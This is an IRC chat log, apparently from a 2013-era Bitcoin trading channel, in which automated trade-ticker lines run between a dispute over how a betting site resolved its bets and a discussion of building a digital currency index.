[TAT.ASICMINER] 1 @ 0.0381 BTC [-] Aug 03 15:35:07 [BTCTC] [LABCOIN] 3 @ 0.001734 = 0.0052 BTC [-] Aug 03 15:35:08 [BTCTC] [LABCOIN] 4 @ 0.001733 = 0.0069 BTC [-] Aug 03 15:35:10 [BTCTC] [LABCOIN] 5000 @ 0.001733 = 8.665 BTC [-] Aug 03 15:35:11 [BTCTC] [LABCOIN] 1760 @ 0.001732 = 3.0483 BTC [-] Aug 03 15:35:12 [BTCTC] [LABCOIN] 100 @ 0.001715 = 0.1715 BTC [-] Aug 03 15:35:19 [BTCTC] [LABCOIN] 150 @ 0.001711 = 0.2567 BTC [-] Aug 03 15:35:20 [BTCTC] [LABCOIN] 2000 @ 0.001711 = 3.422 BTC [-] Aug 03 15:35:22 [BTCTC] [LABCOIN] 2300 @ 0.00171 = 3.933 BTC [-] Aug 03 15:35:23 [BTCTC] [LABCOIN] 5000 @ 0.00171 = 8.55 BTC [-] Aug 03 15:35:23 [BTCTC] [LABCOIN] 5000 @ 0.001709 = 8.545 BTC [-] Aug 03 15:35:24 [BTCTC] [LABCOIN] 8683 @ 0.001709 = 14.8392 BTC [-] Aug 03 15:35:43 [HAVELOCK] [AM100] 10 @ 0.0385 = 0.385 BTC [+] Aug 03 15:35:45 [HAVELOCK] [AM100] 90 @ 0.0385 = 3.465 BTC [+] Aug 03 15:36:18 [BTCTC] [BASIC-MINING] 3 @ 0.4078 = 1.2234 BTC [-] Aug 03 15:36:20 [BTCTC] [BASIC-MINING] 7 @ 0.408 = 2.856 BTC [+] Aug 03 15:42:15 smidge: in which intervals are p1 and p0 calculated? this seems to be critical, because if you do the calc.. well, let's say every new trade, the difference is very small (as only one number changes) and the result oscillates very close to 100 Aug 03 15:51:13 [BTCTC] [ASICMINER-PT] 40 @ 4 = 160 BTC [-] Aug 03 15:53:05 [BTCTC] [BASIC-MINING] 1 @ 0.4078 BTC [-] Aug 03 15:54:21 [BTCTC] [BTCGARDEN] 135 @ 0.0165 = 2.2275 BTC [-] Aug 03 15:55:17 [HAVELOCK] [HIM] 1 @ 0.1353 BTC [-] Aug 03 15:56:17 [BTCTC] [TAT.ASICMINER] 18 @ 0.03811 = 0.686 BTC [+] Aug 03 15:56:44 [BTCTC] [BASIC-MINING] 1 @ 0.408 BTC [+] Aug 03 15:57:13 [BTCTC] [BTCGARDEN] 77 @ 0.0161 = 1.2397 BTC [-] Aug 03 15:57:37 [BTCTC] [BASIC-MINING] 2 @ 0.408 = 0.816 BTC [+] Aug 03 15:57:44 [BTCTC] [TAT.ASICMINER] 17 @ 0.03989 = 0.6781 BTC [+] Aug 03 15:58:08 [BTCTC] [BASIC-MINING] 1 @ 0.4299 BTC [+] Aug 03 15:59:53 ThickAsThieves lol Aug 03 16:00:27 at this rate you'll end up on thestringpuller's list. Aug 03 16:00:46 [BTCTC] [ACTIVEMINING] 20 @ 0.005778 = 0.1156 BTC [-] Aug 03 16:00:54 [BTCTC] [BTCGARDEN] 123 @ 0.0161 = 1.9803 BTC [-] Aug 03 16:00:56 [BTCTC] [BTCGARDEN] 60 @ 0.01602 = 0.9612 BTC [-] Aug 03 16:00:57 [BTCTC] [BTCGARDEN] 117 @ 0.01601 = 1.8732 BTC [-] Aug 03 16:02:27 [BTCTC] [BTCGARDEN] 79 @ 0.01601 = 1.2648 BTC [-] Aug 03 16:02:28 [BTCTC] [BTCGARDEN] 21 @ 0.01601 = 0.3362 BTC [-] Aug 03 16:02:35 [BTCTC] [ACTIVEMINING] 23 @ 0.005604 = 0.1289 BTC [-] Aug 03 16:03:54 [BTCTC] [S.MPOE-PT] 276 @ 0.0009398 = 0.2594 BTC [+] Aug 03 16:03:55 [BTCTC] [S.MPOE-PT] 998 @ 0.0009399 = 0.938 BTC [+] Aug 03 16:03:57 [BTCTC] [S.MPOE-PT] 200 @ 0.0009399 = 0.188 BTC [+] Aug 03 16:03:58 [BTCTC] [S.MPOE-PT] 996 @ 0.0009405 = 0.9367 BTC [+] Aug 03 16:03:59 [BTCTC] [S.MPOE-PT] 1000 @ 0.0009445 = 0.9445 BTC [+] Aug 03 16:04:00 [BTCTC] [S.MPOE-PT] 765 @ 0.0009455 = 0.7233 BTC [+] Aug 03 16:04:01 [BTCTC] [S.MPOE-PT] 300 @ 0.0009458 = 0.2837 BTC [+] Aug 03 16:04:02 [BTCTC] [S.MPOE-PT] 201 @ 0.000946 = 0.1901 BTC [+] Aug 03 16:04:03 [BTCTC] [S.MPOE-PT] 3 @ 0.00095 = 0.0029 BTC [+] Aug 03 16:04:04 [BTCTC] [S.MPOE-PT] 200 @ 0.000998 = 0.1996 BTC [+] Aug 03 16:04:05 [BTCTC] [S.MPOE-PT] 32 @ 0.001 = 0.032 BTC [+] Aug 03 16:04:07 [BTCTC] [S.MPOE-PT] 4 @ 0.001 = 0.004 BTC [+] Aug 03 16:04:08 [BTCTC] [S.MPOE-PT] 3 @ 0.001 = 0.003 BTC [+] Aug 03 16:04:09 [BTCTC] [S.MPOE-PT] 100 @ 0.001099 = 0.1099 BTC [+] Aug 03 16:04:11 [BTCTC] [ACTIVEMINING] 18 @ 0.005605 = 0.1009 BTC [+] Aug 03 16:04:57 [HAVELOCK] [XBOND] 1 @ 0.00102887 BTC [-] Aug 03 16:05:09 [BTCTC] [S.BBET-PT] 42 @ 0.00209 = 0.0878 BTC [+] Aug 03 16:05:10 [BTCTC] [S.BBET-PT] 100 @ 0.0021 = 0.21 BTC [+] Aug 03 16:05:12 [BTCTC] [S.BBET-PT] 100 @ 0.0021 = 0.21 BTC [+] Aug 03 16:05:13 [BTCTC] [S.BBET-PT] 5 @ 0.00218 = 0.0109 BTC [+] Aug 03 16:05:14 [BTCTC] [S.BBET-PT] 158 @ 0.002185 = 0.3452 BTC [+] Aug 03 16:05:15 [BTCTC] [S.BBET-PT] 97 @ 0.00219 = 0.2124 BTC [+] Aug 03 16:05:16 [BTCTC] [S.BBET-PT] 104 @ 0.0022 = 0.2288 BTC [+] Aug 03 16:05:17 [BTCTC] [BASIC-MINING] 1 @ 0.4299 BTC [+] Aug 03 16:05:18 [BTCTC] [S.BBET-PT] 1 @ 0.0022 BTC [+] Aug 03 16:05:19 [BTCTC] [S.BBET-PT] 101 @ 0.00225 = 0.2273 BTC [+] Aug 03 16:05:20 [BTCTC] [S.BBET-PT] 200 @ 0.0025 = 0.5 BTC [+] Aug 03 16:05:21 [BTCTC] [S.BBET-PT] 1 @ 0.0025 BTC [+] Aug 03 16:05:22 [BTCTC] [S.BBET-PT] 148 @ 0.00295 = 0.4366 BTC [+] Aug 03 16:05:23 [BTCTC] [S.BBET-PT] 1000 @ 0.003 = 3 BTC [+] Aug 03 16:05:24 [BTCTC] [S.BBET-PT] 11 @ 0.003 = 0.033 BTC [+] Aug 03 16:05:50 [BTCTC] [BTCGARDEN] 100 @ 0.01601 = 1.601 BTC [-] Aug 03 16:06:49 [MPEX] [S.MPOE] 2388 @ 0.00082451 = 1.9689 BTC [+] Aug 03 16:06:59 [BTCTC] [TAT.ASICMINER] 21 @ 0.03999 = 0.8398 BTC [+] Aug 03 16:07:02 [BTCTC] [BTC-BOND] 4670 @ 0.009999 = 46.6953 BTC [+] Aug 03 16:07:12 [BTCTC] [TAT.ASICMINER] 4 @ 0.03999 = 0.16 BTC [+] Aug 03 16:07:43 [BTCTC] [BASIC-MINING] 4 @ 0.3755 = 1.502 BTC [-] Aug 03 16:07:43 [BTCTC] [BASIC-MINING] 23 @ 0.3754 = 8.6342 BTC [-] Aug 03 16:07:53 *hanbot* heya Aug 03 16:08:32 [BTCTC] [BTCGARDEN] 1 @ 0.0169 BTC [+] Aug 03 16:11:06 ;;bc,stats Aug 03 16:11:08 Current Blocks: 250005 | Current Difficulty: 3.7392766136474565E7 | Next Difficulty At Block: 251999 | Next Difficulty In: 1994 blocks | Next Difficulty In About: 1 week, 2 days, 22 hours, 5 minutes, and 22 seconds | Next Difficulty Estimate: 60068709.9148 | Estimated Percent Change: 60.6426 Aug 03 16:11:27 mircea_popescu: Where, in your BBET accounts, do network payment fees appear? Aug 03 16:11:52 [BTCTC] [BTCGARDEN] 136 @ 0.01602 = 2.1787 BTC [-] Aug 03 16:11:53 [BTCTC] [BTCGARDEN] 30 @ 0.01602 = 0.4806 BTC [-] Aug 03 16:11:55 [BTCTC] [BTCGARDEN] 25 @ 0.01602 = 0.4005 BTC [-] Aug 03 16:12:34 Neil_ nowhere. atm it's cheaper to just eat them than account for them tbh Aug 03 16:12:39 Also not clear, to me at least, where the 0.0x you "donate" to bet proposers goes. Does that get consumed under "house bets". Aug 03 16:12:46 [BTCTC] [BTCGARDEN] 1971 @ 0.01601 = 31.5557 BTC [-] Aug 03 16:12:50 yes. Aug 03 16:12:55 OK Aug 03 16:13:12 House bets could be -ve then but seems to have been forever +ve. What does that say? Aug 03 16:13:21 in general house makes about 50% back of what it bets. Aug 03 16:13:31 they're not +ev except in the perspective where you expect to lose 50%. Aug 03 16:13:41 [BTCTC] [BTCGARDEN] 374 @ 0.0161 = 6.0214 BTC [+] Aug 03 16:13:43 [BTCTC] [BTCGARDEN] 126 @ 0.0161 = 2.0286 BTC [+] Aug 03 16:13:48 if you expect to lose 0% they're always -ev Aug 03 16:14:50 So what is the meaning of house bets exactly? I intially (many moons ago) read it as "that looks like a good punt". But later I realised it means what you gain out of the initial bet distribution on creation. Or something like that, but it's not very clear. Aug 03 16:15:25 it's simple. whenever someone makes a bet, the house splits a dime among yes/no ands puts the lower ammt on the name of the person that proposed the bet. Aug 03 16:15:45 if the bet is a crapshot, the person usually makes nothing but sometimes makes a bunch. Aug 03 16:15:55 if the bet is even the person makes about half, roughly. Aug 03 16:16:14 So "house bets" is the gain on the 0.06 or higher that the house bets, less the 0.04 or lower that the house unconditionally loses? Aug 03 16:16:15 [BTCTC] [DMS.SELLING] 50 @ 0.02424 = 1.212 BTC [-] Aug 03 16:16:20 [BTCTC] [BTCGARDEN] 300 @ 0.01601 = 4.803 BTC [-] Aug 03 16:16:31 house bets is always .1 or more. Aug 03 16:16:39 per bet i mean Aug 03 16:16:42 [BTCTC] [DMS.SELLING] 20 @ 0.02424 = 0.4848 BTC [-] Aug 03 16:16:44 [BTCTC] [DMS.SELLING] 24 @ 0.0243 = 0.5832 BTC [+] Aug 03 16:17:02 [BTCTC] [BTCGARDEN] 805 @ 0.01601 = 12.8881 BTC [-] Aug 03 16:17:04 [BTCTC] [BTCGARDEN] 5 @ 0.01601 = 0.0801 BTC [-] Aug 03 16:17:06 Right but it's split so that 0.06 or higher is house bet, and 0.04 is given to proposer, from what I've seen at least. Aug 03 16:17:06 [BTCTC] [BTCGARDEN] 1 @ 0.01601 BTC [-] Aug 03 16:17:23 take last month : 19 betsa accepted, 2.02 btc bet. Aug 03 16:17:30 [BTCTC] [DMS.SELLING] 20 @ 0.0243 = 0.486 BTC [+] Aug 03 16:17:35 Neil_ ah, yes, that's correct. Aug 03 16:17:48 sometimes it splits 5/6 in which case 5 goes to the proposer Aug 03 16:17:55 OK cool, glad we're on the same boat. I worried for a while. Aug 03 16:18:19 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [-] Aug 03 16:18:37 I assume that your "ethics" then are preventing you from punting for the house? The only reason for my question is the vagueness of the word "house bets" without further explanation. Aug 03 16:18:51 Post-creation. Aug 03 16:18:52 in principle it could split 101/102 or some shit, as unlikely as that may be. in which case 101 would go to proposer. but in no case wil lproposer be assigned more than half the house bet. Aug 03 16:18:56 [BTCTC] [ACTIVEMINING] 25 @ 0.005514 = 0.1379 BTC [-] Aug 03 16:18:57 [BTCTC] [ACTIVEMINING] 50 @ 0.005513 = 0.2757 BTC [-] Aug 03 16:19:13 [BTCTC] [BTCGARDEN] 400 @ 0.016 = 6.4 BTC [-] Aug 03 16:19:21 [BTCTC] [BASIC-MINING] 1 @ 0.4294 BTC [+] Aug 03 16:19:30 [BTCTC] [KENILWORTH] 1 @ 0.001799 BTC [+] Aug 03 16:19:41 well, the people resolving the bets are not betting. i occasionalyl make bets, but i don't think theres to date been an actually contentious one. Aug 03 16:20:25 [BTCTC] [BTCGARDEN] 3672 @ 0.016 = 58.752 BTC [-] Aug 03 16:20:28 i mean people made a lot of hay about bfl delivery in may bet, but... bfl STILL hasn't delivered so. Aug 03 16:20:29 [BTCTC] [ACTIVEMINING] 74 @ 0.005514 = 0.408 BTC [+] Aug 03 16:20:54 [BTCTC] [BTCGARDEN] 200 @ 0.01601 = 3.202 BTC [+] Aug 03 16:20:56 [BTCTC] [BTCGARDEN] 2035 @ 0.016 = 32.56 BTC [-] Aug 03 16:20:59 OK, I think I get it. I assume your own bets are in your own name and not commingled and in such cases you cannot influence the decision of the resolution, and in all other cases "house bets" refers to the initial distribution. Which is cool, it's just not clear, that's all. Aug 03 16:21:48 And like much else in your world, depends on those deciding to participate trusting you. Aug 03 16:22:01 well if it's not clear i'm glad you asked :) Aug 03 16:22:17 and yes. bitcoin is what it is. you either trust or watch. Aug 03 16:22:28 Well I think you could be more transparent, and if you lack it, it's to your detriment not mine. But whatever. Aug 03 16:22:47 problem is people don't like to read. Aug 03 16:22:55 i tend to avoid lengthy faqs etc for this reason. Aug 03 16:23:21 I like to read, from my POV most people don't like to be unambiguous, or worse, don't realize they're being unambiguous. Aug 03 16:23:24 [BTCTC] [BTCGARDEN] 10 @ 0.01601 = 0.1601 BTC [+] Aug 03 16:23:26 [BTCTC] [BTCGARDEN] 602 @ 0.016 = 9.632 BTC [-] Aug 03 16:23:41 i love being unambiguous. Aug 03 16:23:59 Sure. It's fun. But I think you lose in the long run. Aug 03 16:24:15 irc people seem to like reading. how strange. Aug 03 16:24:24 i like pov Aug 03 16:24:25 Personally I, for no really good reason, trust your attempt at independence. But it's never the same thing as real independence. Aug 03 16:24:40 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [-] Aug 03 16:25:17 how do you mean ? Aug 03 16:25:18 I didn't like your resolution of the SDICE issues, which cost me quite some $$$, but I just sucked it up, I don't read it as malice. Aug 03 16:25:35 which issue do you mean ? on bitbet ?! Aug 03 16:25:47 Yeah the SDICE vs BBET I lost quite a lot. Aug 03 16:26:07 [BTCTC] [BASIC-MINING] 1 @ 0.3791 BTC [-] Aug 03 16:26:09 [BTCTC] [BASIC-MINING] 3 @ 0.3791 = 1.1373 BTC [-] Aug 03 16:26:10 [BTCTC] [BASIC-MINING] 1 @ 0.379 BTC [-] Aug 03 16:26:11 [BTCTC] [BASIC-MINING] 5 @ 0.3762 = 1.881 BTC [-] Aug 03 16:26:13 [BTCTC] [BASIC-MINING] 10 @ 0.3761 = 3.761 BTC [-] Aug 03 16:26:25 well if it makes you feel better i didn't have a bet in there. Aug 03 16:26:58 I'm sure you didn't. But that's not the point. I believe you like drama, with reason. Aug 03 16:27:32 what is the difference between s.bbet and s.mpoe ? Aug 03 16:27:34 actually 6 months ago sdice closure was completely off the books. Aug 03 16:27:36 it's a betting site, part of the risk is that the party being betted on makes a bet :| Aug 03 16:27:50 or influences the game in some way Aug 03 16:28:01 frb that's often the case actually. like with the josh-zerlan.com bet Aug 03 16:28:03 or the bitfury bet Aug 03 16:28:04 you have no right to be upset over anything done on a gambling site Aug 03 16:28:09 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [-] Aug 03 16:28:11 [HAVELOCK] [XBOND] 1 @ 0.00102887 BTC [-] Aug 03 16:28:23 dandate2 well tyou could read the contracts no ? Aug 03 16:28:25 you should only gamble for entertainment, not profits. mircea_popescu shouldn't have to aplogize for your gambling losses Aug 03 16:28:25 [BTCTC] [BTCGARDEN] 7 @ 0.01607 = 0.1125 BTC [+] Aug 03 16:28:27 in my opinion Aug 03 16:28:32 they look the same but operated by 2 different people? Aug 03 16:28:40 frb i don't think he was looking for an apology. Aug 03 16:28:51 dandate2 how do they look the same ?! Aug 03 16:29:18 they seem to be both stock in satoshi dice? Aug 03 16:29:53 looky : s.mpoe is the bitcoin stock exchange. bitbet is the bitcoin betting site. Aug 03 16:30:05 s.dice used to be the bitcoin dice site, but seems justdice stole that crown Aug 03 16:30:14 [BTCTC] [LABCOIN] 2 @ 0.001799 = 0.0036 BTC [+] Aug 03 16:31:10 [BTCTC] [BTCGARDEN] 200 @ 0.01601 = 3.202 BTC [-] Aug 03 16:31:24 [BTCTC] [ASICMINER-PT] 5 @ 4.045 = 20.225 BTC [+] Aug 03 16:31:25 [BTCTC] [ASICMINER-PT] 5 @ 4.049 = 20.245 BTC [+] Aug 03 16:33:05 [BTCTC] [ASICMINER-PT] 7 @ 4.001 = 28.007 BTC [-] Aug 03 16:33:06 [BTCTC] [ASICMINER-PT] 3 @ 4 = 12 BTC [-] Aug 03 16:33:42 mircea_popescu: So, returning to SDICE, I personally saw contradiction in (someone)'s decision to decide that while the market cap of SDICE went to zero, the share price didn't. I don't see this as black-and-white, and that if you say the share price didn't go to zero, it's inconsistent to claim the market cap did. The third choice of "no meaning" would have been a more reasonable resolution IMO, but of course would have cost BB Aug 03 16:33:42 ET money. Aug 03 16:35:33 Anyway, I lost money from the decision and cannot be considered unbiased, but IMO it wasn't "right". Aug 03 16:36:05 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [-] Aug 03 16:36:52 [BTCTC] [ASICMINER-PT] 7 @ 4.049 = 28.343 BTC [+] Aug 03 16:37:20 well the idea is that undefined variables are nil. if there's no X trading on Y, the correct value for X on Y is 0. Aug 03 16:37:33 So price should be nil too. Aug 03 16:38:04 right. so anything is higher than 0, so there yo uhave it. Aug 03 16:38:04 But "SIDE less than 0.0016" resolved to false. Aug 03 16:38:11 http://bitbet.us/bet/113/bitbet-will-we-worth-more-than-satoshi-dice/ Aug 03 16:38:16 i thought you meant that 1 Aug 03 16:38:27 I mean both. Consistency my friend :) Aug 03 16:38:30 BitBet - BitBet will we worth more than Satoshi Dice Aug 03 16:38:48 http://bitbet.us/bet/481/s-dice-to-hit-0016-or-below-before-october/ < ?! Aug 03 16:38:50 BitBet - S.DICE to hit .0016 or below before October 2013 Aug 03 16:38:55 this is... um... .2 btc total. Aug 03 16:39:07 [BTCTC] [BTCGARDEN] 60 @ 0.01609 = 0.9654 BTC [+] Aug 03 16:39:08 Bet size is irrelevant to falsehood. Aug 03 16:39:10 but anyway, the text : "S.DICE on MPEx will trade at or below .0016 BTC before October 2013." Aug 03 16:39:20 the problem is the word trading. Aug 03 16:39:24 it's not trading. so 0. Aug 03 16:39:45 [BTCTC] [LTC-ATF.B2] 28 @ 0.01042 = 0.2918 BTC [+] Aug 03 16:39:47 [BTCTC] [LTC-ATF.B2] 35 @ 0.01042 = 0.3647 BTC [+] Aug 03 16:40:23 [BTCTC] [LTC-ATF.B2] 32 @ 0.01043 = 0.3338 BTC [+] Aug 03 16:41:16 [BTCTC] [BMF] 4 @ 0.041 = 0.164 BTC [+] Aug 03 16:41:19 [BTCTC] [BMF] 7 @ 0.042 = 0.294 BTC [+] Aug 03 16:41:20 [BTCTC] [BMF] 10 @ 0.0425 = 0.425 BTC [+] Aug 03 16:41:21 [BTCTC] [BMF] 25 @ 0.043 = 1.075 BTC [+] Aug 03 16:41:22 [BTCTC] [BMF] 71 @ 0.044 = 3.124 BTC [+] Aug 03 16:41:40 [BTCTC] [BTCGARDEN] 100 @ 0.01609 = 1.609 BTC [+] Aug 03 16:43:10 mircea_popescu: If you can't see the contradiction in the resolution of the two bets, I can't help you. I've written it off. But IMO it's a black mark against the neutrality of the resolutions. I don't know how they were decided, but IMO the benefit of drama and 1% fees cannot be ruled out. Aug 03 16:43:39 [BTCTC] [ACTIVEMINING] 25 @ 0.005904 = 0.1476 BTC [+] Aug 03 16:43:40 well, as a matter of fact i can't see such a contradiction. Aug 03 16:43:40 [BTCTC] [ACTIVEMINING] 144 @ 0.005905 = 0.8503 BTC [+] Aug 03 16:43:41 [BTCTC] [ACTIVEMINING] 54 @ 0.005911 = 0.3192 BTC [+] Aug 03 16:43:41 [BTCTC] [ACTIVEMINING] 50 @ 0.005915 = 0.2958 BTC [+] Aug 03 16:43:42 [BTCTC] [ACTIVEMINING] 570 @ 0.005967 = 3.4012 BTC [+] Aug 03 16:43:43 [BTCTC] [ACTIVEMINING] 95 @ 0.005968 = 0.567 BTC [+] Aug 03 16:43:52 OK. I can't help you. Aug 03 16:43:59 but i think the drama theory is weak. seems going the other way would have generated more. Aug 03 16:44:10 the 1% theory is also weak, as the site charges the same total no matter who wins. Aug 03 16:44:26 Refund means 0% is my point. Aug 03 16:44:46 a. refunds aren't terribly likely, thatg's for sure. Aug 03 16:44:48 [BTCTC] [BITVPS] 250 @ 0.002099 = 0.5248 BTC [+] Aug 03 16:44:49 [BTCTC] [BITVPS] 156 @ 0.0021 = 0.3276 BTC [+] Aug 03 16:44:50 [BTCTC] [BITVPS] 500 @ 0.0021 = 1.05 BTC [+] Aug 03 16:45:22 OK, then consistency please. Either price is zero or it isn't. If zero, market cap is zero. If not, market cap isn't zero. Unless contortious logic is applied. Aug 03 16:46:13 the 2nd was decided on "whether it trades or doesn't trade" not on whether it's 0 or isn't 0. Aug 03 16:46:23 [BTCTC] [LABCOIN] 4 @ 0.001726 = 0.0069 BTC [-] Aug 03 16:46:24 [BTCTC] [LABCOIN] 250 @ 0.001725 = 0.4313 BTC [-] Aug 03 16:46:26 [BTCTC] [LABCOIN] 200 @ 0.001721 = 0.3442 BTC [-] Aug 03 16:46:27 [BTCTC] [LABCOIN] 1546 @ 0.00172 = 2.6591 BTC [-] Aug 03 16:46:29 Whatever. Hand-waving is easy. Aug 03 16:46:52 it'd seem to me this is an explanation not a hand-weaving. Aug 03 16:47:28 I've made my point, that is all. Aug 03 16:48:04 [BTCTC] [BTCGARDEN] 750 @ 0.016 = 12 BTC [-] Aug 03 16:48:39 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [-] Aug 03 16:49:30 [MPEX] [S.MPOE] 3484 @ 0.00082509 = 2.8746 BTC [+] Aug 03 16:50:48 [BTCTC] [BTCGARDEN] 10 @ 0.01601 = 0.1601 BTC [+] Aug 03 16:50:49 [BTCTC] [BTCGARDEN] 740 @ 0.016 = 11.84 BTC [-] Aug 03 16:53:48 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [+] Aug 03 16:54:39 [BTCTC] [BTCGARDEN] 121 @ 0.016 = 1.936 BTC [-] Aug 03 16:56:10 Today is going to be a wild one. I feel it. Aug 03 16:56:18 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [+] Aug 03 16:57:04 why, do we have upcoming ipos of people posting fpga pics? Aug 03 16:57:09 [BTCTC] [ASICMINER-PT] 4 @ 4.05 = 16.2 BTC [+] Aug 03 16:57:12 that would be awesome Aug 03 16:58:43 [BTCTC] [LTC-ATF.B2] 1 @ 0.01043 BTC [+] Aug 03 16:59:01 lol Aug 03 17:00:08 [BTCTC] [BMF] 1 @ 0.04479 BTC [+] Aug 03 17:01:25 i dont know but is there a new ipo yet, i'm bored Aug 03 17:01:36 [BTCTC] [ACTIVEMINING] 3 @ 0.005953 = 0.0179 BTC [-] Aug 03 17:01:53 ipos should come with shoe on head. Aug 03 17:02:17 [BTCTC] [ASICMINER-PT] 2 @ 4.09 = 8.18 BTC [+] Aug 03 17:03:46 [BTCTC] [DMS.SELLING] 75 @ 0.02499 = 1.8743 BTC [+] Aug 03 17:03:56 [BTCTC] [BTCGARDEN] 600 @ 0.016 = 9.6 BTC [-] Aug 03 17:04:54 i think the market is so full of get rich quick adventurers, you could ipo an usb stick (non-miner) Aug 03 17:04:55 [BTCTC] [DMS.MINING] 1 @ 0.01144 BTC [+] Aug 03 17:05:28 [BTCTC] [BTCGARDEN] 790 @ 0.016 = 12.64 BTC [-] Aug 03 17:05:29 [BTCTC] [LABCOIN] 35 @ 0.001749 = 0.0612 BTC [+] Aug 03 17:05:31 [BTCTC] [LABCOIN] 210 @ 0.00175 = 0.3675 BTC [+] Aug 03 17:05:52 is that why you dusted off dcx project and putting it up for ipo? Aug 03 17:06:10 [HAVELOCK] [LABCO] 49 @ 0.003 = 0.147 BTC [+] Aug 03 17:06:17 good idea, i should ipo that thing Aug 03 17:06:32 ;) Aug 03 17:06:37 if noone else wants on stage today, ill ipo an index thats been running for 18 hours Aug 03 17:06:40 1000 shares plz Aug 03 17:07:00 smidge how old are you ? Aug 03 17:07:29 stop it with the personal questions already Aug 03 17:07:33 :) Aug 03 17:07:54 ... Aug 03 17:08:12 ok, ill cut the crap. 35 Aug 03 17:08:29 [BTCTC] [BASIC-MINING] 4 @ 0.4265 = 1.706 BTC [+] Aug 03 17:08:31 [BTCTC] [BASIC-MINING] 1 @ 0.4266 BTC [+] Aug 03 17:08:32 [BTCTC] [BASIC-MINING] 3 @ 0.4268 = 1.2804 BTC [+] Aug 03 17:08:33 [BTCTC] [BASIC-MINING] 5 @ 0.4289 = 2.1445 BTC [+] Aug 03 17:08:33 [BTCTC] [BASIC-MINING] 15 @ 0.429 = 6.435 BTC [+] Aug 03 17:08:37 been on irc since the mid 90s tbh Aug 03 17:08:46 aha. Aug 03 17:09:02 you? Aug 03 17:09:05 [HAVELOCK] [XBOND] 55 @ 0.00102887 = 0.0566 BTC [-] Aug 03 17:10:16 [HAVELOCK] [HIM] 1 @ 0.1359 BTC [+] Aug 03 17:10:53 bout same Aug 03 17:11:08 minus, i took a break from irc for a good two decades Aug 03 17:11:53 [BTCTC] [BASIC-MINING] 2 @ 0.425 = 0.85 BTC [-] Aug 03 17:12:02 [HAVELOCK] [XBOND] 64 @ 0.00102888 = 0.0658 BTC [+] Aug 03 17:12:04 [HAVELOCK] [XBOND] 48 @ 0.001029 = 0.0494 BTC [+] Aug 03 17:12:09 [BTCTC] [COGNITIVE] 5 @ 0.449 = 2.245 BTC [+] Aug 03 17:12:10 [BTCTC] [COGNITIVE] 1 @ 0.45 BTC [+] Aug 03 17:12:12 [BTCTC] [COGNITIVE] 1 @ 0.4523 BTC [+] Aug 03 17:12:12 well i havent been on non-stop aswell Aug 03 17:12:28 i think maybe in the 90s irc was bigger in europe than in the states Aug 03 17:13:41 yep Aug 03 17:14:59 mircea i just disagreed with you btw, you should uningnore some ppl Aug 03 17:15:05 [BTCTC] [BTC-BOND] 100 @ 0.01 = 1 BTC [+] Aug 03 17:15:08 huh ? Aug 03 17:17:52 [BTCTC] [BTCGARDEN] 62 @ 0.01607 = 0.9963 BTC [+] Aug 03 17:19:06 [BTCTC] [ACTIVEMINING] 25 @ 0.005641 = 0.141 BTC [-] Aug 03 17:19:07 [BTCTC] [ACTIVEMINING] 50 @ 0.00564 = 0.282 BTC [-] Aug 03 17:19:08 [BTCTC] [ACTIVEMINING] 6 @ 0.005638 = 0.0338 BTC [-] Aug 03 17:19:09 [BTCTC] [ACTIVEMINING] 14 @ 0.005635 = 0.0789 BTC [-] Aug 03 17:21:12 [BTCTC] [BASIC-MINING] 2 @ 0.4244 = 0.8488 BTC [-] Aug 03 17:22:51 DCX is up 2.99% Aug 03 17:24:44 http://dcx.smidge.com/ Aug 03 17:24:46 DCX - The Digital Currency Index Project Aug 03 17:24:50 which securities should be added? Aug 03 17:25:04 high market cap, except funds Aug 03 17:25:34 [BTCTC] [LABCOIN] 2 @ 0.00187 = 0.0037 BTC [+] Aug 03 17:25:47 smidge: in which intervals are p1 and p0 calculated? this seems to be critical, because if you do the calc.. well, let's say every new trade, the difference is very small (as only one number changes) and the result oscillates very close to 100 Aug 03 17:25:49 smidge: BITVPS? Aug 03 17:25:54 BTCINVEST? Aug 03 17:25:57 [BTCTC] [ASICMINER-PT] 1 @ 4.054 BTC [-] Aug 03 17:26:04 smidge s.mpoe mkt cap is about 800k btc. Aug 03 17:27:03 dexX7 very good question, i currently plan on setting the interval to daily Aug 03 17:27:31 as you described, the variance would be too low Aug 03 17:27:44 [BTCTC] [BTCGARDEN] 200 @ 0.01607 = 3.214 BTC [+] Aug 03 17:27:59 [BTCTC] [BTCGARDEN] 80 @ 0.01601 = 1.2808 BTC [-] Aug 03 17:28:19 [BTCTC] [BTCGARDEN] 61 @ 0.01601 = 0.9766 BTC [-] Aug 03 17:31:11 [BTCTC] [BTCGARDEN] 93 @ 0.01601 = 1.4889 BTC [-] Aug 03 17:31:19 [BTCTC] [BTCGARDEN] 1010 @ 0.01601 = 16.1701 BTC [-] Aug 03 17:31:44 smidge: would you then take the end of day (or whatever interval) price of each asset or some averaged value? Aug 03 17:31:46 bitvps market cap is under 1k Aug 03 17:32:41 dex the last price of the day would be used as reference for the next Aug 03 17:33:22 [BTCTC] [BTCGARDEN] 5432 @ 0.016 = 86.912 BTC [-] Aug 03 17:34:03 btcinvest is a fund Aug 03 17:34:49 what is bitvps market cap? Aug 03 17:35:12 890 btc Aug 03 17:35:30 mircea, 800k? lol wut Aug 03 17:35:48 [BTCTC] [TAT.ASICMINER] 25 @ 0.04 = 1 BTC [+] Aug 03 17:35:55 the smallest security in the index is cognitive with ~5k Aug 03 17:36:01 all 1k securities would be dwarfed Aug 03 17:36:25 unless we switch the whole index wo equal weight Aug 03 17:36:30 smidge yup. Aug 03 17:36:33 which is not realistic anymore Aug 03 17:36:38 !ticker m s.bbet Aug 03 17:36:39 [MPEX:S.BBET] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.00099999 / 0.00099999 / 0.00099999 (1200 shares, 1.20 BTC), 30D: 0.0005505 / 0.0006199 / 0.00102899 (24599 shares, 15.25 BTC) Aug 03 17:36:57 bitbet would be about 6200 btc on the month avg Aug 03 17:37:42 6.2k sounds better Aug 03 17:37:56 lol what is this, smallcap index ? Aug 03 17:38:02 asicminer is like 1.2mn you know. Aug 03 17:38:07 [BTCTC] [BTCGARDEN] 201 @ 0.016 = 3.216 BTC [-] Aug 03 